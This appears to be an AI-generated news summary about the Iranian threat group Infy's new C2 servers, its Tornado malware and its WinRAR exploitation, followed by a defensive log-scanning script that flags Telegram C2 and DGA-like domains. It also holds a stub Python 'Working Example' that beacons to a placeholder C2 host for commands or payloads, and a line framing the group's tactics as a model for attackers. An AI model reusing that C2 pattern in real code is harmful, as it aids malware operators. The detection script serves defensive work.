Infy Hackers Revive Operations with New C2 Servers and Tornado Malware
These articles are AI-generated summaries. Please check the original sources for full details.
Infy Hackers Resume Operations with New C2 Servers
The Iranian threat group known as Infy has resumed its operations, setting up new command-and-control (C2) servers and deploying updated malware, including Tornado version 51, which uses both HTTP and Telegram for C2. This development comes after a brief hiatus during the Iranian government’s internet blackout in January 2026, with the group’s activities observed to have restarted on January 26, 2026.
Why This Matters
The resurgence of Infy’s operations highlights the evolving nature of state-sponsored threat groups, which continually adapt and improve their tactics to evade detection and achieve their objectives. The use of Telegram as a C2 channel and the exploitation of WinRAR vulnerabilities demonstrate the group’s ability to leverage various vectors to compromise targets, underscoring the need for robust cybersecurity measures to counter such threats. The potential correlation with other threat groups, such as Charming Kitten, further complicates the landscape, suggesting a network of interconnected actors that can share tactics and tools.
Key Insights
- Infy’s renewed activity was observed on January 26, 2026, with the setup of new C2 servers, indicating a possible state-sponsored affiliation given the timing with the end of Iran’s internet blackout.
- The latest version of Tonnerre, codenamed Tornado (version 51), employs a unique approach to generating C2 domain names, using both a new DGA algorithm and fixed names via blockchain data de-obfuscation.
- Infy has been linked to the exploitation of a 1-day security flaw in WinRAR, specifically either CVE-2025-8088 or CVE-2025-6218, to deliver the Tornado payload.
Working Example
# Example of how Tornado malware might establish communication with its C2 server over HTTP
import requests

def establish_c2_communication(c2_server_url):
    try:
        response = requests.get(c2_server_url)
        if response.status_code == 200:
            # Execute commands or download additional payloads as instructed by the C2 server
            print("C2 communication established successfully.")
        else:
            print("Failed to establish C2 communication.")
    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")

# Example usage
c2_server_url = "http://example.com/c2"
establish_c2_communication(c2_server_url)
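From the defender's side, the two C2 traits the summary attributes to Tornado (Telegram as a C2 channel and a DGA for domain names) can be turned into a simple egress-log check. The following is an added example written for this page, not code from the article or the cited reports; the log format, the process allow-list and the DGA thresholds are constructed assumptions, and the real Tornado DGA is not known from this page.

```python
import math
from collections import Counter

# Constructed sample of egress proxy log lines (not real Infy/Tornado traffic):
# "<timestamp> <process> <destination host>"
SAMPLE_LOG = """\
2026-01-26T08:01:12Z telegram.exe api.telegram.org
2026-01-26T08:02:45Z winword.exe api.telegram.org
2026-01-26T08:03:10Z svchost.exe update.microsoft.com
2026-01-26T08:04:02Z notepad.exe xk7qzp3vbtw9m.com
2026-01-26T08:05:33Z chrome.exe thehackernews.com
"""

# Hypothetical allow-list: processes for which Telegram API traffic is expected.
TELEGRAM_ALLOWED_PROCESSES = {"telegram.exe"}
TELEGRAM_API_HOST = "api.telegram.org"


def shannon_entropy(label: str) -> float:
    """Bits of entropy per character of a domain label."""
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_generated(host: str, min_len: int = 12, min_entropy: float = 3.2,
                    max_vowel_ratio: float = 0.25) -> bool:
    """Heuristic DGA check on the registrable label (the part before the TLD).
    Thresholds are assumptions chosen for this example, not Tornado-specific."""
    parts = host.lower().split(".")
    if len(parts) < 2:
        return False
    label = parts[-2]
    if len(label) < min_len:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    return shannon_entropy(label) >= min_entropy and vowel_ratio <= max_vowel_ratio


def scan_log(log_text: str) -> list[tuple[str, str, str]]:
    """Return (reason, process, host) for each line worth an analyst's look."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue  # skip malformed lines rather than crash the scan
        _ts, process, host = fields
        if host == TELEGRAM_API_HOST and process not in TELEGRAM_ALLOWED_PROCESSES:
            findings.append(("telegram-c2-candidate", process, host))
        elif looks_generated(host):
            findings.append(("dga-like-domain", process, host))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the Office process talking to the Telegram API and the high-entropy domain, while the legitimate messenger, the update host and the news site pass.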
Practical Applications
- Use Case: Infy’s tactics, such as using Telegram for C2 communications and exploiting WinRAR vulnerabilities, can serve as a model for other threat groups, highlighting the importance of monitoring and adapting to emerging threats.
- Pitfall: Overreliance on traditional security measures without considering the evolving nature of threats like Infy can lead to significant vulnerabilities, emphasizing the need for continuous threat intelligence and adaptive cybersecurity strategies.
References:
- http://thehackernews.com/2026/02/infy-hackers-resume-operations-with-new.html
- https://www.safebreach.com/ (for detailed reports on Infy and other threat groups)